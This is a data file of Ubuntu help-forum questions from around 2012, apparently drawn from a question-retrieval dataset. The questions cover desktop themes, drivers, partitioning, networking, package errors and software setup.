179322	gtk3 theme in kde	i am using kubuntu 12.04 and qtcurve widget style which does not support gtk3 : how can apply a gnome theme for gtk3 apps ? i found an advice here : installed gnome-themes-standard and gnome-themes-extras packages , created file ~/.config/gtk-3.0/settings.ini : [ settings ] gtk-theme-name = adwaita gtk-fallback-icon-theme = gnome but this did n't help .
179323	trendnet tew-624ub 300mbps correct optimized driver	got a trendnet tew-624ub 300mbps newer revision wifi usb dongle . works just fine ! on checking connection information on n etwork manager it shows up as a 150mbps device using rtl8192cu as a driver . this device is a 300mbps wifi dongle . the maximum tx strength is 80 % and signal strength 100 % ... which is just fine ! but i have no range ? ! ! checked with the router touching it and its still 80 % on checking this device with win7 everything is 100 % running @ 300mbps ... ... ..it catches 2 floors strong signal but not with ubuntu 12.04 ! simply put the `` rtl8192cu `` is a 150mbps driver and not 300mbps . is there a 300mbps driver or an upgrade path for this device that i can use far away from my 300 mbps router ... .. it works fine @ 150mbps but with no range . thanks .
179324	huawei e173 on ubuntu 12.04	i have a huawei e173 usb stick to access the internet . it works normally on windows but i 'd like to be able to use it on my ubuntu system as well . i plug it in , and after 25-20 seconds the status light turns green and blinks twice every 3 seconds , which according to the manual means that the stick is activated and waiting to connect to a network . i see no changes in my system whatsoever , nothing gets installed , i do n't get prompted for my pin , no reaction at all . how should i proceed in order to get it working ?
179325	accepting ssh connections only from localhost	i just installed ssh and i would like to set it up to only accept connections from localhost . i plan to point a .onion address to it so that i may connect to it from anywhere on any network .
179329	aptitude install apach derby ij	i see a similar question here : question how do i connect to toursdb of derby database using ij in ubuntu how do i connect to toursdb of derby database using ij in ubuntu i have ubuntu , i have installed javadb ( derby ) at /usr/share/javadb , how do i connect to toursdb of derby database using ij in ubuntu http : //ubuntuforums.org/showthread.php ? t=1862996 but ca n't find much information on installing ij . i just want to install ij .
179331	ubuntu networking	i want to connect to ubuntu linux machine for file transfer . one is at my office connected to the internet using a router . other machine is at my home which is also connected to the internet using a router . i had gone through the following documents which have not helped me . https : //help.ubuntu.com/community/ssh_vpn thanks in advance
179333	how can i disable access to the file system for a specific user or group ?	it is very important for what i am doing now .
179335	ubuntu 12.04 switch window does not change language	i used to work with ubuntu 10.04 , in which every window retained the selected language . so if i where to write in english in one window and in another language in some other window , switching back and forth using alt+tab would keep the windows each in its own language i have now installed 12.04 but i see that the language setting affects all windows . is there a way to toggle this behavior ? thanks in advance
179340	how to reset evolution settings to defaults ?	i have not used evolution for long time now and i would like to reset all the settings and start from scratch . how would i be able to do this ?
179345	problems with libreoffice 3.6.0.4 rendering ms office 2007 documents	i currently have 10.04 installed with the latest version of libreoffice . before , i used to work in windows 7 and ms office 2007 . most if not all of my documents is in word and excel format . now i am in libreoffice , and know about the small conversion changes , when opening up a document created in word in libreoffice writer . the one problem i have is the rendering . my pages seems to get larger - libreoffice writer is creating auto spacing in-between lines where there were n't any spaces , making my document that is a 2-page long , to 4 pages . sometimes after re-editing in libreoffice writer , i can only get up to 3 pages , because there are n't any space left on the pages . everything fits to a 2-page document in word , but ca n't fit to 2 pages in libreoffice . what can i do ?
179346	is it possible to move free space from ubuntu partition to windows , when windows is located before ubuntu ?	i have windows partition sda2 and then , next to it , extended partition with ubuntu sda6 . can i reallocate some of ubuntu 's free space to sda2 ? i know i can boot from livecd gparted and cut some gb from sda6 , but then the unallocated space will be after sda6 and not before , am i right ? is it possible to add the unallocated space to sda2 or merge it , if not possible due to partitions position ? from the screenshot , it looks like that space can be stuck in the middle of the extended partition :
179348	how to run gedit and subl commands in the background ?	if i use gedit or subl ( sublime text ) commands in the terminal to open a file , i ca n't do anything else in the terminal until i close the text editor . how can i fix this ?
179353	how do i install 12.04 in vmware	what do i need to download to run 12.04 lts as a vm using vmware player v5.0 ?
179354	how does the command `` linux-boot-prober '' work ?	i have installed some ubuntu on my lvm disks . in ubuntu10.04 , i rename the ubuntu12.04 's lv but the `` linux-boot-probe '' goes wrong . here is what i did : sudo lvname lvmdisk ubuntu12.04 labubuntu12.04 # i have installed ubuntu12.04 on this lv sudo linux-boot-prober /dev/mapper/lvmdisk-labubuntu12.04 the following is the result . we still can see root=/dev/mapper/lvmdisk-ubuntu12.04 . it does n't change ? why ? /dev/mapper/lvmdisk-labubuntu12.04 : /dev/mapper/lvmdisk-labubuntu12.04 : ubuntu , with linux 3.2.0-30-generic-pae : /boot/vmlinuz-3.2.0-30-generic-pae : /boot/initrd.img-3.2.0-30-generic-pae : root=/dev/mapper/lvmdisk-ubuntu12.04 ro quiet splash $ vt_handoff /dev/mapper/lvmdisk-labubuntu12.04 : /dev/mapper/lvmdisk-labubuntu12.04 : ubuntu , with linux 3.2.0-30-generic-pae ( recovery mode ) : /boot/vmlinuz-3.2.0-30-generic-pae : /boot/initrd.img-3.2.0-30-generic-pae : root=/dev/mapper/lvmdisk-ubuntu12.04 ro recovery nomodeset
179356	dpkg-reconfigure -a : `ia32-libs-multiarch ' is not installed	ubuntu 12.04 , couple days old . multiarch is installed . checked in synaptics and software center.. reinstalled a couple times , from both places . it still gives me these errors : $ sudo dpkg-reconfigure -a package `ia32-libs-multiarch ' is not installed and no info is available . use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . /usr/sbin/dpkg-reconfigure : ia32-libs-multiarch is not installed $ sudo dpkg -- info ia32-libs-multiarch dpkg-deb : error : failed to read archive `ia32-libs-multiarch ' : no such file or directory $ dpkg -l ia32-libs-multiarch desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un ia32-libs-mult < none > ( no description available ) $ dpkg -l *multiarch* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un ia32-libs-mult < none > ( no description available ) un libgl1-mesa-gl < none > ( no description available ) ii multiarch-supp 2.15-0ubuntu10 transitional package to ensure multiarch com un pango1.0-multi < none > ( no description available ) un xserver-xorg-c < none > ( no description available ) -- i installed ia32 shared libraries - transitional package and multiarch-support ( multiarch-supprt : i386 is not installable as it wants to remove the other one ) , and tried unpacking , configuring , and installing : still says not there .
179360	install ubuntu10.04 on lvm : : error : no such disk	i installed ubuntu10.04 on one lvm disk . but when i boot my computer . it prompts : error : no such disk but after a few seconds , it can display the grub menu and i can go in my ubuntu10.04 . what is wrong ? does anyone have the same problems ?
179361	how to change a ubuntu one device name ?	in 12.04 , how do i change the device name of ubuntu one ?
179362	how to create partitions in ubuntu while installing ?	i had windows 7 crashed . so i wanted to install 12.04 . while installing , i am not able to create a new partition after deleting all earlier partitions . i mean i am able to create but not able to understand the technical jargons as i am new to any version of linux . please help me with the steps for creating to create three partition of 50gb , 50gb and 150gb . i want my ubuntu files to be in one of the 50gb partition or suggest any better way to partition . ( i have only 1 hard disk of 250gb in my laptop ) . if possible please explain to what the technical terms mean .
179363	can i disconnect an ejected drive even if it is still spinning ?	i am running ubuntu 12.04 . when i unmount ( eject ) usb disk , the power led is always `` on '' & i can feel disk is still spinning after 10 minutes . this means disk is not unmounted from system ? is it safe to disconnect the usb cable ? i does not want to damage my external disk .
179365	resolution problem on 12.04 ( sis )	i am unable to set the correct resolution on a fujitsu scenic machine running ubuntu 12.04 . the link to the xorg log file is below , which might help those who know how to fix this problem . any idea or suggestion is appreciated . link to xorg log thanks in advance
179367	copy paste on a mac	i have installed on my mac ubuntu with virtualbox . i would like to copy informations displayed on a terminal and then paste it on a 'edit-file ' on my mac or wherever on my mac . it does n't seems to work . i highlighted some lines with on the terminal , command-right clicked and then copied the content , but i can paste it wherever on ubuntu but not on a common file on my mac . can anyone help ?
179368	shift+f2 is ignored when using byobu with putty ( windows 7 )	connecting to byobu in ubuntu 12.04.1 ( precise ) from putty on a windows 7 system , when i type shift+f2 to get a vertical split , nothing happens . typing plain f2 works and opens a new window . i tried all the terminal keyboard types in putty configuration ( ex . xterm r2 , linux ) without any luck . any ideas ? is there nay another keyboard shortcut to do the same thing ?
179373	poor performance when looking at youtube videos	i am using lenovo computer having the following configuration : 516 mb ram and 3.06 ghz cpu when i installed 11.04 , the system was getting very slow . from the internet , i read an article that lubuntu desktop are very light-weight desktop , so i installed it in ubuntu . when i switched to lubuntu desktop , the system got a little bit faster , but when i open youtube site or some other video-streaming websites , the system gets slower .
179375	ca n't login when switching to tty1	i 'm running ubuntu 12.04 . when i switch to the first text terminal using ctrl+alt+f1 , i 'm presented with a prompt that asks for user name and password . when i input the user name and password , i get login incorrect . i 'm typing the right user name and password . what could be the problem ? here is the output of dmesg here is the /var/log/auth.log
179376	how to remove gnome-fallback ?	some time ago i 've upgraded my ubuntu 11.04 to 12.04 . now i have gnome2 as well as gnome3 . it 's a bit useless to have them both , so could u please tell me how can i remove gnome2 safely ?
179380	how to increase the delay that is taken to start an application when an icon is clicked in the ubuntu launcher ?	my problem is that it regularly happens that i click on the wrong icon into the ubuntu launcher and then an application is started that i do n't want . is there a way to increase the time that i have to click on an icon to start an application using the unity launcher ? ubuntu 12.04 64 bits
179385	what 's the most straight-forward way to install mythtv with a full desktop environment ?	install ubuntu and then add mythtv ? install mythbuntu and add desktop environment packages ? also , would unity cause problems ? i 'm willing to switch to something different ( like gnome ) . also , would it work any better if i switched to something like mint ?
179392	how do i turn off thumbnails in the file manager ?	for privacy reasons i 'd like to clean out the hidden folder ~/.thumbnails , how do i manage the information in this folder ?
179394	what is lubuntu and xubuntu ?	i am beginner at linux 's os.so i need some clarification.is lubuntu and xubuntu linux distros ? you need ubuntu to install them ? why people install them what the difference with ubuntu ? what 's cool about them ?
179395	add unity 2d panel to xfce	how to add unity 2d panel to xfce environment , but only unity 2d panel , not the dash
179399	anti phishing software ?	is there an anti phishing software in ubuntu which may even rate websites while searching and surfing , something like avg secure search in windows or the software u get with bitdefender which puts a ticks or crosses on links while searching.though most modern browsers come with minimal anti phishing settings ( or tools ) but a good independent software working on all browsers ( i am talking about even the not so famous ones ) and rating websites wood be good .
179406	libreoffice 3.6.0.4 calc saving as tab delimited	i am using libreoffice calc , latest version . i like to save my document in `` tab delimited '' - that `` tab delimited '' is a feature in ms excel and then one can open up the document in windows 7 - notepad . that enables one to then upload the `` .txt '' into an online system that is currently used . i read the following article , but this is also there , but mainly about open office : http : //www.oooforum.org/forum/viewtopic.phtml ? t=71690 save as > select `` save as text csv , give the file a name and then click okay . keep going until calc asks what delimiters you want and select 'tab < < is this correct way by doing this , because the extenstion is still showing me .csv , and not sure if it did save it as .txt like windows and ms office would .
179410	how do i tune wordpress to make my site more responsive ?	i have a linode that has ubuntu loaded and am hosting a wordpress site . i would like to optimize my site so that i no longer get out of memory errors like the following : killed process 16660 ( apache2 ) total-vm:186232kb , anon-rss:87404kb , file-rss:0kb i have 512 mb of ram and whenever i get a spike of 500+ users trying to access the site , the site becomes unresponsive and i start getting the errors above . what optimizations can i make to help improve site performance ?
179413	problems with running .sh files	i am running ubuntu 12.04 lts and i ca n't seem to be able to run .sh files . i have marked it as executable in properties and i tried to run it through the gui . however , the terminal just flashed on the screen and does n't do anything . when i try to run the file through the terminal i get the following error : minecraft_installer_20.sh : 2 : minecraft_installer_20.sh : syntax error : newline unexpected
179414	ubuntu does n't boot from live cd	i boot ubuntu 12.04 lts from a live cd , it shows me the purples screen of ubuntu then it shows a black screen , it freezes and never boot , note that i have downloaded ubuntu 3 times and burned it on 3 dvds and it does n't work , something is wrong . i tried all types of burning and also tried using a usb , nothing worked , someone told me that it 's because i do n't have an nvidia graphic card , in fact i have intel r graphic card , would that be the cause of the problem ?
179418	how does lightdm auto-login and start a program ?	i have a user called xbmc my lightdm.conf looks like this [ seatdefaults ] autologin-user=xbmc autologin-user-timeout=0 greeter-session=unity-greeter user-session=xbmc it logs in automatically perfectly - but then starts a program /usr/bin/xbmc-standalone - how does it do this ? what i want to do is monitor that process and restart it correctly if it locks ( but i need to see how it starts in the first place ) thanks rob
179419	programming softwares	hi i 'm new to ubuntu i am a computer science also working with information security . i need a development environment for c , c++ , java , vb , .net , perl , ptyhon , ruby suggest me the best ide easy to install , customize and usage . please answer me soon
179428	speed up local network ( not internet )	i have ubuntu 10.04 computer specs : i5 16gb memory 1tb hdd 1 gigabit onboard network card asus p8h77mle motherboard i have 10 users , logged in at the same time , using the computer as a server / terminal , and connecting to it . the computer is very fast , but the people that log in locally have slow connections , and sometimes have to wait for a response . what can i do ?
179432	java server problem	i want to make server with xubuntu but i do n't know anything about linux , so is there any software which can install java jre 7 automatically . -windows uses too much ram-
179435	problem connecting to eap-fast wireless	i have problem connecting to eap-fast network on our office wireless . its prompts for the username/password but even after entering it keeps prompting for the same . below is what i see in logs . ctrl-event-eap-proposed-method vendor=0 method=43 - > nak ctrl-event-eap-failure eap authentication failed running on 12.04
179437	how can i burn a raspberry pi image to sd card from ubuntu ?	i 'm sure this must be fairly simple but ca n't find it here . how does one go from having a blank sd card to having an sd card that boots a raspi ?
179438	'w : failed to fetch ... ' while updating	this is the output of the command sudo apt-get update . i ca n't update any packages with update manager either . so what is the problem and how can i fix it ? ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.canonical.com precise inrelease ign http : //de.archive.ubuntu.com precise inrelease ign http : //de.archive.ubuntu.com precise-updates inrelease ign http : //extras.ubuntu.com precise inrelease hit http : //security.ubuntu.com precise-security release.gpg hit http : //archive.canonical.com precise release.gpg ign http : //dl.google.com stable inrelease ign http : //ppa.launchpad.net precise inrelease hit http : //de.archive.ubuntu.com precise release.gpg hit http : //security.ubuntu.com precise-security release hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release.gpg get:1 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release.gpg hit http : //de.archive.ubuntu.com precise-updates release.gpg hit http : //extras.ubuntu.com precise release hit http : //security.ubuntu.com precise-security/main sources get:2 http : //dl.google.com stable release hit http : //archive.canonical.com precise/partner i386 packages hit http : //ppa.launchpad.net precise release hit http : //de.archive.ubuntu.com precise release hit http : //extras.ubuntu.com precise/main sources hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex ign http : //archive.canonical.com precise/partner translationindex get:3 http : //dl.google.com stable/main i386 packages [ 1,234 b ] hit http : //ppa.launchpad.net precise/main sources hit http : //de.archive.ubuntu.com precise-updates release hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //security.ubuntu.com precise-security/universe translationindex ign http : //dl.google.com stable/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //de.archive.ubuntu.com precise/main sources hit http : //de.archive.ubuntu.com precise/restricted sources hit http : //de.archive.ubuntu.com precise/universe sources hit http : //de.archive.ubuntu.com precise/multiverse sources hit http : //de.archive.ubuntu.com precise/main i386 packages hit http : //de.archive.ubuntu.com precise/restricted i386 packages hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //de.archive.ubuntu.com precise/universe i386 packages hit http : //de.archive.ubuntu.com precise/multiverse i386 packages get:4 http : //de.archive.ubuntu.com precise/main translationindex [ 3,706 b ] hit http : //de.archive.ubuntu.com precise/multiverse translationindex hit http : //de.archive.ubuntu.com precise/restricted translationindex get:5 http : //de.archive.ubuntu.com precise/universe translationindex [ 2,922 b ] hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //de.archive.ubuntu.com precise-updates/main sources hit http : //de.archive.ubuntu.com precise-updates/restricted sources hit http : //de.archive.ubuntu.com precise-updates/universe sources hit http : //de.archive.ubuntu.com precise-updates/main i386 packages hit http : //de.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //de.archive.ubuntu.com precise-updates/universe i386 packages hit http : //de.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //de.archive.ubuntu.com precise-updates/main translationindex hit http : //de.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //de.archive.ubuntu.com precise-updates/restricted translationindex hit http : //de.archive.ubuntu.com precise-updates/universe translationindex hit http : //de.archive.ubuntu.com precise/multiverse translation-en hit http : //de.archive.ubuntu.com precise/multiverse translation-de hit http : //de.archive.ubuntu.com precise/restricted translation-en hit http : //de.archive.ubuntu.com precise/restricted translation-de hit http : //de.archive.ubuntu.com precise-updates/main translation-en hit http : //de.archive.ubuntu.com precise-updates/main translation-de hit http : //de.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //de.archive.ubuntu.com precise-updates/multiverse translation-de hit http : //de.archive.ubuntu.com precise-updates/restricted translation-en hit http : //de.archive.ubuntu.com precise-updates/restricted translation-de hit http : //de.archive.ubuntu.com precise-updates/universe translation-en hit http : //de.archive.ubuntu.com precise-updates/universe translation-de err http : //de.archive.ubuntu.com precise-updates/multiverse sources 404 not found ign http : //archive.canonical.com precise/partner translation-en_us ign http : //archive.canonical.com precise/partner translation-en ign http : //archive.canonical.com precise/partner translation-de ign http : //dl.google.com stable/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //dl.google.com stable/main translation-de ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-de ign http : //extras.ubuntu.com precise/main translation-de fetched 2,781 b in 1s ( 2,698 b/s ) w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/precise/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/de.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_index w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/index no hash entry in release file /var/lib/apt/lists/partial/de.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_index w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
179442	vpn for ssh , internet for all the rest	intro : hi , i 've been trying to get a vpn and ssh command to work together . and i 've been successful to the point where i can get on the server with ssh user @ hostname . but when the vpn is active , all of my internet passes trough that vpn . target : i 'd like to use my own internet connection for everything other than that ssh connection . option breaks ssh > vpn : i 've noticed that there is an option `` use this connection only for resources on its network '' in the `` editing vpn '' - `` ipv4 settings '' tab - `` routes ... '' button . it seemed like the solution , but if i enable that , i ca n't connect anymore with the `` ssh user @ hostname '' command , it hangs till it times out . thoughts : my thoughts so far are that it does not work because the hostname ( from ssh username @ hostname ) and the gateway ( from the vpn settings ) are different . but i do n't know enough about ssh or vpn to know that . ideas ? is there like an option in ssh that i am overlooking ? i tried ssh -b gatewayfromvpn username @ hostname but this did n't seem to work ( and i doubt it should ) . or is there an option in the vpn settings or something that could solve this ? thanks in advance . summary browse etc > internet connection ( simultaneously with ) ssh > vpn connection '' use this connection only for resources on its network '' breaks ssh > vpn
179446	minecraft goes black on 12.04 and eee901	since downgrading to an older release of ubuntu wo n't solve the problem for this version , i try to fix it this way . it is basically this guy 's problem but with a little difference : minecraft goes black on 12.04 upgrading lwjgl does not work , as they are `` already updated '' in minecraft 1.3 . i think that other users of eee901 have the same problem . i will still downgrade to other versions because it might be reasonable to try the java jre 6 trick . i will keep track on this thread on another computer meanwhile . exception in thread `` thread-3 '' java.lang.unsatisfiedlinkerror : /home/sadmin/.minecraft/bin/natives/liblwjgl.so : libjawt.so : can not open shared object file : no such file or directory at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( classloader.java:1924 ) at java.lang.classloader.loadlibrary ( classloader.java:1821 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at org.lwjgl.sys $ 1.run ( sys.java:69 ) at java.security.accesscontroller.doprivileged ( native method ) at org.lwjgl.sys.doloadlibrary ( sys.java:65 ) at org.lwjgl.sys.loadlibrary ( sys.java:81 ) at org.lwjgl.sys. < clinit > ( sys.java:98 ) at net.minecraft.client.minecraft.f ( sourcefile:1857 ) at aof. < init > ( sourcefile:20 ) at net.minecraft.client.minecraft. < init > ( sourcefile:77 ) at anw. < init > ( sourcefile:36 ) at net.minecraft.client.minecraftapplet.init ( sourcefile:36 ) at net.minecraft.launcher.replace ( launcher.java:136 ) at net.minecraft.launcher $ 1.run ( launcher.java:79 )
179450	multi-threading in application designed in quickly	i have a tree which i populate with a file list from my computer on the click of a button . while the program is populating the tree the whole gui hangs . is there a way to populate the tree in another thread so the tree gets populated as the files are found and not when everything has already been added ? or any other ideas ? this is what it looks like : i am populating the tree with this code : def traversepaths ( self , path , parent ) : files = os.listdir ( path ) files.sort ( ) for myfile in files : if myfile [ 0 ] ! = `` . `` : if os.path.isdir ( path + os.sep + myfile ) : current = self.filelist.append ( parent , [ self.diricon , self.diricon , self.diropenicon , myfile , '' dd '' , true , true,3 ] ) self.traversepaths ( path + os.sep + myfile , current ) else : current = self.filelist.append ( parent , [ self.fileicon , self.diricon , self.diropenicon , myfile , '' aa '' , true , true,3 ] ) which is executed on a button click : def on_refreshbutton_clicked ( self , button ) : self.traversepaths ( self.path.get_filename ( ) , none ) i do n't think threading.thread works because of the gtk thread for the gui and can not find gi.repository.gtk api 's on the subject any ideas ?
179452	12.04 lts no sound at all from speakers	i have a computer running 12.04 lts and i have only ever downloaded 12.04 on this pc ( i had puppylinux but it was from a live cd , and windows xp home but it was not activated . ) so when i hit the sound options from the top panel , the only sound option i get for output ( to speakers/headphones etc ) is the dummy output and i have a soundcard ( embedded to the motherboard ) and ubuntu does not pick up the soundcard and i have no sound at all not even boot sounds . pc specs : cpu : intel xeon ( 2.40 ghz ) gpu : i have no idea ram : 4 gb mobo : i know its an intel motherboard psu : 400 watts bios : 2006 phoenix bios embedded server bios ) type of pc or use of pc before i had it : server ( as in big business pc built to run 24/7 365 days a year ) any one got any ideas ?
179455	reallocated sector count - is drive failure really imminent ?	i just recently installed ubuntu ( latest version ) alongwise my windows xp . first , after trying the live cd , it was giving me messages about hard disk failure . i decided to go ahead and dual boot with my windows xp . the first problem that i had was that it did n't give me the option to install alongside windows xp , and the `` something else '' was n't very helpful in manually having to define my own partitions . i restarted my computer and tried again , and still did n't show it . i left for an hour or so and came back and restarted again . this time , it did show the option to install alongisde windows , so i did it , leaving 20 gb on my windows partition and 40 gb on my ubuntu partition . i still get popups often about the disk failure thing . in smart data it says this : reallocated sector count normalized : 134 worst : 134 threshhold : 140 value : 526 sectors failing now , i 've never had problems with this in windows . could this possibly be an error ? my computer is a dell latitude d630 laptop computer . can i still use the laptop as normal ?
179459	will the 12.04.1 iso appear on the ubuntu website ?	following the release schedule for 12.04 here , i see that today , the 12.04.1 maintenance release will come out . since it includes all updates found for 12.04 up until today and saves me a lot of bandwidth and time , how will i know i am downloading the 12.04.1 if it comes out today . for example , the only clue right now is the part about precise 12.04.1 includes the ubuntu 3.2.0-29.46 kernel . which is mentioned in the kernel section in this link but apart from that i do not know if it is a torrent/iso with the 12.04.1 name on it , or the 12.04 but implying that the updates are included already . for example a desktop-12.04-64bit.iso that includes all 12.04.1 or a desktop-12.04.1-64bit.iso that mentions the `` .1 '' so i know it is the maintenance release . will it appear in the website as 12.04.1 so i know it is the maintenance release or it is assumed that from the 23rd of august the torrent/iso downloaded is the 12.04.1 even though it only mentions it as 12.04 ? sorry for the confusion , just want to be sure since it involves me , my `` very fast '' bandwidth and the amount of hours for it to download .
179460	12.04 does n't recognize pendrive	i have new pendrive which i 've used few hours ago . now my ubuntu ( 12.04 ) does n't recognize it . usb ports are right because other devices plugged to them works . when i check lsusb , it returns : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 03f0:7104 hewlett-packard deskjet 3420c bus 001 device 004 : id 12d1:140c huawei technologies co. , ltd . bus 001 device 005 : id 04f3:0103 elan microelectronics corp . bus 002 device 008 : id 058f:1234 alcor micro corp . flash drive when i use fdisk there is no sign of my pendrive on returned list . i think it 's device problem because windows also doens't see it , but i do n't know if i can do anything . i can add that pendrive is very hot when it 's plugged .
179462	how can i re-instate my admin privileges ?	i am running 12.04 lts . it 's a pretty default installation and is the only os on this machine . i have two users one has administrator rights the other does not . i accidentally removed administrator rights from the `` admin '' user . i tried to add myself back as a sudo user but that requires reaching grub during boot but i can not get there because my /etc/default/grub has grub_hidden_timeout=0 and changing that to a positive integer requires admin privileges to save the changes and run sudo update-grub . should i boot from livecd ? the reasons for using a livecd session discouraged my a bit . right now all i have handy is an install dvd from 11.10 , but that did not help me much . not sure what to do now . any suggestions ? note : 12.04 does not have an admin group and i have not enabled root
179463	change default path mozilla thunderbird	tengo una duda , hace poco instale mozilla thunderbird en ubuntu 12.04 pero me gustaria cambiar la ruta por defecto donde este cliente descargar los mensajes . por ejemplo yo cambie la ruta en el outlook ( *.pst ) estan ubicados en el disco d , algo parecido quiero hacer para mozilla thunderbird . gracias . hello i am peruvian , i have a question , i recently installed mozilla thunderbird in ubuntu 12.04 but i would like to change the default path where this client to download messages . for example , i change the path in outlook ( * . pst ) are located in the disk d , something i do to mozilla thunderbird . thanks .
179470	ubuntu 12.04.1 ready ?	i 'm trying to see if the first point release 12.04.1 is ready , but i ca n't tell from the ubuntu web site . i 'm running 10.04 in some labs and according to ubuntu we should wait for the first point release before we upgrade from 10.04 to 12.04 .
179472	how to create a script file to input password ?	i have a small script file , to run nautilus as root . that reads : gksu nautilus and it prompts for the root password . is there a way to automatically input my password inside the script file ? i know this is not a safe practice , i just want to know if i can do it .
179473	dual-boot 12.04 on a computer already running windows 7 - disk partition details	i am a total beginner to the world of ubuntu . i would like you people to help me on how to dual-boot 12.04 on a computer already running windows 7 ultimate . i have : dual core processor , 2gb ram , 500gb hard disk with c occupying 100gb ( windows is over here ) , d having 180gb ( all other stuff like movies , songs and stuff ) , e having 185gb ( totally empty ) . i would like to install it on e by allocating 30gb ( 25 for root and 5 for swap ) to it by partitioning the disk . the problem is that when i select something else option it shows all the disks properly but when i select sda4 i.e . local disk e , the add option does not respond . only change option responds on that window . i 'm totally confused . please help me on that . is gparted a good option ? if yes , then please elaborate . if possible please provide screen-shots of everything .
179477	when trying to install virtualbox i am asked for a cd which i do not have	trying to install virtualbox on 12.04 and i get a message saying to insert the following cd to continue : ubuntu 12.04 lts precise pangolin - release amd64 ( 20120425 ) does anyone know where i can get this cd or its contents ?
179478	how to get screencloud to use prtscn key	i recently downloaded the screencloud app from the ubuntu software center , and coming from windows 7 , it acts a lot like the `` lightshot '' program . like the lightshot program on windows , i would like to be able to hit the prtscn button on my keyboard in order to take a `` select area '' screenshot with screencloud . so , in order to do that , i went to screencloud > preferences > hotkeys > double clicked on `` capture selection '' and hit the prtscn button , and it did n't work . i made sure the gnome-screenshot was un-installed by going to the terminal and typing : sudo apt-get remove gnome-screenshot so that should n't be interfering with it . i also tried other combinations and was fine . ( except the default `` shift > alt > 2 '' . i was un-able to get it to go back to that . ) please help ! thank you !
179480	wget fails to download an image	i 'm trying to do a script so i can set this image as background and update it each 10 minutes , but i can not even download the image : $ wget `` http : //static.die.net/earth/mercator/1600.jpg '' -o imagen.jpg -- 2012-08-23 17:51:41 -- http : //static.die.net/earth/mercator/1600.jpg solving static.die.net ( static.die.net ) ... 209.151.236.22 , 2607 : f820:42 : :16 connecting with static.die.net ( static.die.net ) [ 209.151.236.22 ] :80 ... connected . http request sent , waiting reply ... 200 ok length : 37 [ image/gif ] saving to : “imagen.jpg” 100 % [ ====================================== > ] 37 -- .-k/s en 0s 2012-08-23 17:51:42 ( 5,58 mb/s ) - “imagen.jpg” saved [ 37/37 ] and `` imagen.jpg '' 's size is 37 bytes ... any idea ? pd : output of wget was in spansih , so i translated into english .
179487	wi-fi connected , but not connected to internet	i am using 12.04 on a dell vostro 1014 . i have been using wifi in this laptop previously , it was working well then . but now i got a new wifi connection at my home and it is not working . can someone help me with this ?
179504	how to make external microphone default ?	my laptop 's internal microphone is broken and i use only the external one . however , each time i switch the computer on , i have to change it from internal to external in command-line alsamixer or alsamixergui , gnome alsa mixer and preferences â sound do n't show the int/ext switch . how can i change it permanently ?
